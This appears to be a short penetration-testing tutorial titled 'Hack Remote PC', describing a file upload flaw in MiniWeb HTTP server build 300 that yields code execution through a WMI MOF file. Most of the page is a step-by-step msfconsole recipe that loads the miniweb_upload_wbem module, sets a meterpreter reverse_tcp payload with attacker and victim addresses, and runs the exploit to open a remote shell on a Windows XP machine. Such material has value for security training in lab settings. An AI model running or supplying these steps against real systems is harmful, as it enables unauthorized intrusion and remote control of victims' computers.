Categories

Archives

Kali Linux, Penetration Testing

Hack Remote PC using MiniWeb (Build 300) Arbitrary File Upload

This module exploits a vulnerability in MiniWeb HTTP server (build 300).The software contains a file upload vulnerability that allows an unauthenticated remote attacker to write arbitrary files to the file system. Code execution can be achieved by first uploading the payload to the remote machine as an exe file, and then upload another mof file, which enables WMI (Management Instrumentation service) to execute the uploaded payload. Please note that this module currently only works for Windows before Vista

Exploit Targets

MiniWeb HTTP server (build 300)

Requirement

Attacker: Kali Linux

Victim PC: Windows XP SP 3

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/http/miniweb_upload_wbem

msf exploit (miniweb_upload_wbem)>set payload windows/meterpreter/reverse_tcp

msf exploit (miniweb_upload_wbem)>set lhost 192.168.1.137 (IP of Local Host)

msf exploit (miniweb_upload_wbem)>set rhost 192.168.1.129 (IP of Victim PC)

msf exploit (miniweb_upload_wbem)>exploit